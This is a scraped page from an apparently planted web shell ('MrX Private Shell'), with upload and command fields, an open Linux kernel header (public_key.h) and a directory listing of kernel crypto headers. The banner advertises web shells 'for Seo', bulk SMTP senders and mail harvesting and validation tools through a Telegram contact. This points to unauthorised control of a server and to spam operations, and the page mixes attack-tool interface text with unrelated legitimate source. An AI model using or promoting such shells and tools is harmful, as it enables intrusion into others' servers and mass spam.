__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/* SPDX-License-Identifier: GPL-2.0-or-later */
/* Asymmetric public-key algorithm definitions
 *
 * See Documentation/crypto/asymmetric-keys.rst
 *
 * Copyright (C) 2012 Red Hat, Inc. All Rights Reserved.
 * Written by David Howells ([email protected])
 */

#ifndef _LINUX_PUBLIC_KEY_H
#define _LINUX_PUBLIC_KEY_H

#include <linux/errno.h>
#include <linux/keyctl.h>
#include <linux/oid_registry.h>

/*
 * Cryptographic data for the public-key subtype of the asymmetric key type.
 *
 * Note that this may include private part of the key as well as the public
 * part.
 */
struct public_key {
	void *key;
	u32 keylen;
	enum OID algo;
	void *params;
	u32 paramlen;
	bool key_is_private;
	const char *id_type;
	const char *pkey_algo;
	unsigned long key_eflags;	/* key extension flags */
#define KEY_EFLAG_CA		0	/* set if the CA basic constraints is set */
#define KEY_EFLAG_DIGITALSIG	1	/* set if the digitalSignature usage is set */
#define KEY_EFLAG_KEYCERTSIGN	2	/* set if the keyCertSign usage is set */
};

extern void public_key_free(struct public_key *key);

/*
 * Public key cryptography signature data
 */
struct public_key_signature {
	struct asymmetric_key_id *auth_ids[3];
	u8 *s;			/* Signature */
	u8 *digest;
	u32 s_size;		/* Number of bytes in signature */
	u32 digest_size;	/* Number of bytes in digest */
	const char *pkey_algo;
	const char *hash_algo;
	const char *encoding;
};

extern void public_key_signature_free(struct public_key_signature *sig);

extern struct asymmetric_key_subtype public_key_subtype;

struct key;
struct key_type;
union key_payload;

extern int restrict_link_by_signature(struct key *dest_keyring,
				      const struct key_type *type,
				      const union key_payload *payload,
				      struct key *trust_keyring);

extern int restrict_link_by_key_or_keyring(struct key *dest_keyring,
					   const struct key_type *type,
					   const union key_payload *payload,
					   struct key *trusted);

extern int restrict_link_by_key_or_keyring_chain(struct key *trust_keyring,
						 const struct key_type *type,
						 const union key_payload *payload,
						 struct key *trusted);

#if IS_REACHABLE(CONFIG_ASYMMETRIC_KEY_TYPE)
extern int restrict_link_by_ca(struct key *dest_keyring,
			       const struct key_type *type,
			       const union key_payload *payload,
			       struct key *trust_keyring);
int restrict_link_by_digsig(struct key *dest_keyring,
			    const struct key_type *type,
			    const union key_payload *payload,
			    struct key *trust_keyring);
#else
static inline int restrict_link_by_ca(struct key *dest_keyring,
				      const struct key_type *type,
				      const union key_payload *payload,
				      struct key *trust_keyring)
{
	return 0;
}

static inline int restrict_link_by_digsig(struct key *dest_keyring,
					  const struct key_type *type,
					  const union key_payload *payload,
					  struct key *trust_keyring)
{
	return 0;
}
#endif

extern int query_asymmetric_key(const struct kernel_pkey_params *,
				struct kernel_pkey_query *);

extern int verify_signature(const struct key *,
			    const struct public_key_signature *);

#if IS_REACHABLE(CONFIG_ASYMMETRIC_PUBLIC_KEY_SUBTYPE)
int public_key_verify_signature(const struct public_key *pkey,
				const struct public_key_signature *sig);
#else
static inline
int public_key_verify_signature(const struct public_key *pkey,
				const struct public_key_signature *sig)
{
	return -EINVAL;
}
#endif

#endif /* _LINUX_PUBLIC_KEY_H */

Filemanager

Name Type Size Permission Actions
internal Folder 0755
acompress.h File 7.7 KB 0644
aead.h File 18.89 KB 0644
aes.h File 2.74 KB 0644
akcipher.h File 11.32 KB 0644
algapi.h File 7.55 KB 0644
arc4.h File 484 B 0644
aria.h File 16.71 KB 0644
authenc.h File 635 B 0644
b128ops.h File 2.26 KB 0644
blake2b.h File 1.57 KB 0644
blake2s.h File 2.62 KB 0644
blowfish.h File 415 B 0644
cast5.h File 590 B 0644
cast6.h File 607 B 0644
cast_common.h File 232 B 0644
chacha.h File 3.32 KB 0644
chacha20poly1305.h File 1.66 KB 0644
cryptd.h File 2 KB 0644
ctr.h File 1.42 KB 0644
curve25519.h File 2.02 KB 0644
des.h File 1.68 KB 0644
dh.h File 3.03 KB 0644
drbg.h File 9.02 KB 0644
ecc_curve.h File 1.36 KB 0644
ecdh.h File 2.46 KB 0644
engine.h File 3.72 KB 0644
gcm.h File 1.48 KB 0644
gf128mul.h File 9.25 KB 0644
ghash.h File 388 B 0644
hash.h File 33.06 KB 0644
hash_info.h File 1023 B 0644
hmac.h File 173 B 0644
if_alg.h File 6.5 KB 0644
kdf_sp800108.h File 2.07 KB 0644
kpp.h File 9.53 KB 0644
md5.h File 497 B 0644
nhpoly1305.h File 2.18 KB 0644
null.h File 346 B 0644
padlock.h File 438 B 0644
pcrypt.h File 821 B 0644
pkcs7.h File 1.15 KB 0644
poly1305.h File 2.44 KB 0644
polyval.h File 445 B 0644
public_key.h File 3.39 KB 0644
rng.h File 6.61 KB 0644
scatterwalk.h File 2.74 KB 0644
serpent.h File 696 B 0644
sha1.h File 1.18 KB 0644
sha1_base.h File 2.46 KB 0644
sha2.h File 3.75 KB 0644
sha256_base.h File 3.12 KB 0644
sha3.h File 879 B 0644
sha512_base.h File 3.18 KB 0644
sig.h File 8.2 KB 0644
skcipher.h File 32.47 KB 0644
sm3.h File 1.6 KB 0644
sm3_base.h File 2.55 KB 0644
sm4.h File 1.22 KB 0644
streebog.h File 949 B 0644
twofish.h File 743 B 0644
utils.h File 1.89 KB 0644
xts.h File 978 B 0644
Filemanager